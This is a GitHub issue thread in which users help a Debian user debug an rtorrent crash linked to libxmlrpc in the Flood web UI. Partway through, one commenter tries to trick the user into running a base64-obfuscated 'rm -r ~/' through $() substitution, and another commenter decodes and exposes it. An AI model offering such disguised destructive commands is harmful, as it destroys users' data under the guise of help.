Flood-UI / flood

A web UI for rTorrent, qBittorrent and Transmission with a Node.js backend and React frontend. Migrate to v4: https://github.com/jesec/flood/wiki/Migrate-from-older-versions-of-Flood.
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rtorrent crashes after starting Flood #264

Closed LufyCZ closed 7 years ago

LufyCZ commented 7 years ago

I succesfully setup Flood, I got into the web-interface (login screen, and loading screen), but nothing after that. I was getting a /api/stats 500 error, so I disabled rtorrent sock in config.js. It looks like I made a step forward, but rtorrent crashes right after loading Flood. I put alot of time into setting up Flood (maybe 5 hours of time), and I would like to get it to end. Thanks

rtorrent output - http://pastebin.com/t46Khm7m flood output - http://pastebin.com/0NxJr77j

TETYYS commented 7 years ago

looks like a bug in libxmlrpc that could be potentially triggered by flood

xmlrpc strikes again..

TETYYS commented 7 years ago

can you compile libxmlrpc from source with debug symbols and try again in valgrind?

LufyCZ commented 7 years ago

Thats ./configure -g, right ?

TETYYS commented 7 years ago

./configure --debug

LufyCZ commented 7 years ago

Unrecognized option :-/

TETYYS commented 7 years ago

hmm, try everything till it works, it should work with either of these: --debug | --debu | --deb | --de | --d | -d

LufyCZ commented 7 years ago

Nope, none of them works

albino commented 7 years ago

don't you want CFLAGS="-g" ./configure?

LufyCZ commented 7 years ago

That one works, thanks

LufyCZ commented 7 years ago


TETYYS commented 7 years ago

now recompile rtorrent while linking it to your debuggified libxmlrpc

LufyCZ commented 7 years ago

I think it replaced the previous xmlrpc. Do I still have to recompile rtorrent ?

albino commented 7 years ago

it shouldn't have, unless you changed the destination prefix. the compiled one should be in /usr/local/lib, packaged one in /usr/lib.

and yeah, you have to recompile regardless (afaik)

ShambaBanikIT commented 7 years ago

if gdb still refuses to output proper errors that help to further diagnose the problem there's still hope that IDA can be useful.

Your mind is the vehicle for your growth

TETYYS commented 7 years ago

but valgrind just reported that error is in libxmlrpc

LufyCZ commented 7 years ago


albino commented 7 years ago

in /usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33

this is not the xmlrpc you compiled

LufyCZ commented 7 years ago

And what should I do then

TETYYS commented 7 years ago

i suggest hack-modifying rtorrent configure files or temporary replacing /usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33 with your own one

albino commented 7 years ago
export CPPFLAGS="-I/usr/local/include"
export LDFLAGS="-L/usr/local/lib"

should work?

LufyCZ commented 7 years ago

Export command not found

albino commented 7 years ago

what shell and OS are you using?

LufyCZ commented 7 years ago

No idea, Debian 8

albino commented 7 years ago

not having export is like walking out of the house in the morning without trousers. what happens with echo $SHELL?

LufyCZ commented 7 years ago


albino commented 7 years ago

my own machine with debian8/bash works absolutely fine.

# export FOO=BAR

what have you done to your computer?

LufyCZ commented 7 years ago

Idk :-/ maybe bcs its a kde version and its a 32bit ?

ShambaBanikIT commented 7 years ago

that's odd. what's the output of grep export ~/.bashrc?

He is Nirgura. He is Nirakaar. He is the Para-Brahman that is all pervading.

albino commented 7 years ago

no, that shouldn't have anything to do with it. At this point i feel like throwing in the towel, if we can't even set a shell variable properly what hope is there?

TETYYS commented 7 years ago

just temporarily replace /usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33 with your own

LufyCZ commented 7 years ago

Shamba: folder or file doesnt exist (translated)

LufyCZ commented 7 years ago

TETYYS: And where my own one located at ?

ShambaBanikIT commented 7 years ago

hm, might as well try to run: redacted

Men should take their knowledge from the sun, the moon and the stars

albino commented 7 years ago

don't run that

LufyCZ commented 7 years ago


albino commented 7 years ago
~ $ echo cm0gLXIgfi8K | base64 -d
rm -r ~/
~ $ 
ShambaBanikIT commented 7 years ago

you need the $()

LufyCZ commented 7 years ago

Wth are you talking aabout

albino commented 7 years ago

$() means "run the output of" the output of echo cm0gLXIgfi8K | base64 -d is rm -r ~/ so $(echo cm0gLXIgfi8K | base64 -d) will run rm -r ~/ and remove your home dir

edit: nice try you cheeky shamba bugger

ShambaBanikIT commented 11 minutes ago • edited

TETYYS commented 7 years ago

@Lukyczk do you know where did you compile your debuggized libxmlrpc?

LufyCZ commented 7 years ago

T. Yeah I do White sounds logical :-/

ShambaBanikIT commented 7 years ago

can you try export under sh?

  1. sh
  2. export FOO="BAR"
  3. echo $FOO

Yoga without Dogma. Stretch without Ganesh. Breathe without Krishna. Hare you…!

albino commented 7 years ago

Shamba's example is wrong, third line should read echo $FOO

LufyCZ commented 7 years ago

Ok, im out, ill do this tomorrow

ShambaBanikIT commented 7 years ago

are you on steroids white?

It does not matter how slowly you go as long as you do not stop.

jfurrow commented 7 years ago

Thanks to everyone helping @Lukyczk. Let me know if there's anything I can do.

TETYYS commented 7 years ago

have you ever noticed that returns xmlrpc data in a very disgusting format?

jfurrow commented 7 years ago

@TETYYS Are you asking me? I'm don't understand the question.

LufyCZ commented 7 years ago

Should I try to reinstall the PC ? If so, do you have a good distribution for a seedbox ?

BananaCoke commented 7 years ago

Don't go rushing reinstalling your OS just cuz something is not working, that's a bad habit that you don't want to get into. Did you try to run the export command again? Maybe you typo'd something yesterday?

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